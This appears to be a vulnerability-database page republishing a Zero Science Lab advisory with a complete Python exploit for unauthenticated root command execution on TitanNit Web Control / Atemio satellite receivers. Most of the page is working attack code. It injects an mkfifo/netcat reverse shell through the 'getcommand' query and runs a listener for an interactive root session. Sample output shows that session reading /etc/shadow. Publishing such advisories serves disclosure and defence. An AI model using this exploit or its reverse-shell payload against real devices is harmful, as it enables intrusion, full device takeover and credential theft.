TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution

🗓️ 25 Nov 2023 00:00:00Reported by Gjoko KrsticType

zeroscience🔗 www.zeroscience.mk👁 372 Views

Atemio 7600 Root Remote Code Execution vulnerability in TitanNit Web Control 2.01

Reporter	Title	Published	Views	Family All 12
GithubExploit	Exploit for CVE-2024-9166	26 Sep 202423:21	–	githubexploit
Circl	CVE-2024-9166	26 Sep 202419:40	–	circl
CNNVD	Atelmo Atemio AM 520 HD Full HD Satellite Receiver 操作系统命令注入漏洞	26 Sep 202400:00	–	cnnvd
CVE	CVE-2024-9166	26 Sep 202416:55	–	cve
Cvelist	CVE-2024-9166 OS Command Injection in Atelmo Atemio AM 520 HD Full HD Satellite Receiver	26 Sep 202416:55	–	cvelist
EUVD	EUVD-2024-49767	3 Oct 202520:07	–	euvd
ICS	Atelmo Atemio AM 520 HD Full HD Satellite Receiver	26 Sep 202406:00	–	ics
Nuclei	TitanNit Web Control 2.01/Atemio 7600 - Remote Code Execution	3 Jun 202606:04	–	nuclei
NVD	CVE-2024-9166	26 Sep 202417:15	–	nvd
Positive Technologies	PT-2024-39466	26 Sep 202400:00	–	ptsecurity

<html><body><p>#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution
#
#
# Vendor: AAF Digital HD Forum | Atelmo GmbH
# Product web page: http://www.aaf-digital.info | https://www.atemio.de
# Affected version: Firmware &lt;=2.01
#
# Summary: The Atemio AM 520 HD Full HD satellite receiver enables the
# reception of digital satellite programs in overwhelming image quality
# in both SD and HD ranges. In addition to numerous connections, the small
# all-rounder offers a variety of plugins that can be easily installed
# thanks to the large flash memory. The TitanNit Linux software used combines
# the advantages of the existing E2 and Neutrino systems and is therefore
# fast, stable and adaptable.
#
# Desc: The vulnerability in the device enables an unauthorized attacker
# to execute system commands with elevated privileges. This exploit is
# facilitated through the use of the 'getcommand' query within the application,
# allowing the attacker to gain root access.
#
# ========================================================================
# _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999
# [*] Starting callback listener child thread
# [*] Listening on port 9999
# [*] Generating callback payload
# [*] Calling
# [*] Callback waiting: 3s
# [*] ('192.168.1.13', 40943) called back
# [*] Rootshell session opened
# sh: cannot set terminal process group (1134): Inappropriate ioctl for device
# sh: no job control in this shell
# sh-5.1# id
# &lt;-sh-5.1# id
# uid=0(root) gid=0(root)
# sh-5.1# cat /etc/shadow | grep root
# &lt;-sh-5.1# cat /etc/shadow | grep root
# root:$6$TAdBGj2mY***:18729:0:99999:7:::
# sh-5.1# exit
# [*] OK, bye!
#
# _# 
# =======================================================================
#
# Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics)
#            GNU/Linux 3.14-1.17 (armv7l)
#            GNU/Linux 3.14.2 (mips)
#            ATEMIO M46506 revision 990
#            Atemio 7600 HD STB
#            CPU STx7105 Mboard
#            titan web server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5801
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
#
#
# 16.11.2023
#

from time import sleep
import threading
import requests
import socket
import sys

class RemoteControl:

    def __init__(self):
        self.timeout = 10
        self.target = None
        self.callback = None
        self.cstop = threading.Event()
        self.path = "/query?getcommand=&amp;cmd="
        self.lport = None
        self.cmd = None

    def beacon(self):
        self.cmd   = "mkfifo /tmp/j;cat /tmp/j|sh -i 2&gt;&amp;1|nc "
        self.cmd  += self.callback + " "
        self.cmd  += str(self.lport) + " "
        self.cmd  += "&gt;/tmp/j"
        self.path += self.cmd
        r = requests.get(self.target + self.path)

    def slusaj(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("0.0.0.0", self.lport))
        s.listen(1)
        print("[*] Listening on port " + str(self.lport))
        sleep(1)
        try:
            conn, addr = s.accept()
            print("\n[*]", addr, "called back")
            print("[*] Rootshell session opened")
            self.cstop.set()
        except socket.timeout:
            print("[-] Call return timeout\n[!] Check your ports")
            conn.close()
        while True:
            try:
                odg = conn.recv(999999).decode()
                sys.stdout.write(odg)
                command = input()
                command += "\n"
                if "exit" in command:
                    exit(-17)
                conn.send(command.encode())
                sleep(0.5)
                sys.stdout.write("&lt;-" + odg.split("\n")[-1])
            except:
                print("[*] OK, bye!")
                exit(-1)
        s.close()

    def tajmer(self):
        for z in range(self.timeout, 0, -1):
            poraka = f"[*] Callback waiting: {z}s"
            print(poraka, end='', flush=True)
            sys.stdout.flush()
            sleep(1)
            if self.cstop.is_set():
                break
            print(' ' * len(poraka), end='\r')

        if not self.cstop.is_set():
            print("[-] Call return timeout\n[!] Check your ports")
            exit(0)
        else:
            print(end=' ')

    def thricer(self):
        print("[*] Starting callback listener child thread")
        plet1 = threading.Thread(name="ZSL", target=self.slusaj)
        plet1.start()
        sleep(1)
        print("[*] Generating callback payload")
        sleep(1)
        print("[*] Calling")
        plet2 = threading.Thread(name="ZSL", target=self.tajmer)
        plet2.start()
        self.beacon()
        plet1.join()
        plet2.join()

    def howto(self):
        if len(sys.argv) != 4:
            self.usage()
        else:
            self.target = sys.argv[1]
            self.callback = sys.argv[2]
            self.lport = int(sys.argv[3])
            if not self.target.startswith("http"):
                self.target = "http://{}".format(self.target)

    def dostabesemolk(self):
        naslov = """
    o===--------------------------------------===o
    |                                            |
    | TitanNit Web Control Remote Code Execution |
    |                ZSL-2023-5801               |
    |                                            |
    o===--------------------------------------===o
                          ||
                          ||
                          ||
                          ||
                          ||
                          ||
                          ||
                          ||
                          L!
                         /_)
                        / /L
_______________________/ (__)
_______________________  (__)
                       \_(__)
                          ||
                          ||
                          ||
                          ||
                          ||
                          ||
        """
        print(naslov)

    def usage(self):
        self.dostabesemolk()
        print("Usage: ./titan.py <target ip=""> <listen ip=""> <listen port="">")
        print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999")
        exit(0)

    def main(self):
        self.howto()
        self.thricer()

if __name__ == '__main__':
    RemoteControl().main()
</listen></listen></target></p></body></html>

25 Nov 2023 00:00Current

5.9Medium risk

Vulners AI Score5.9

CVSS 49.3

EPSS0.0369

SSVC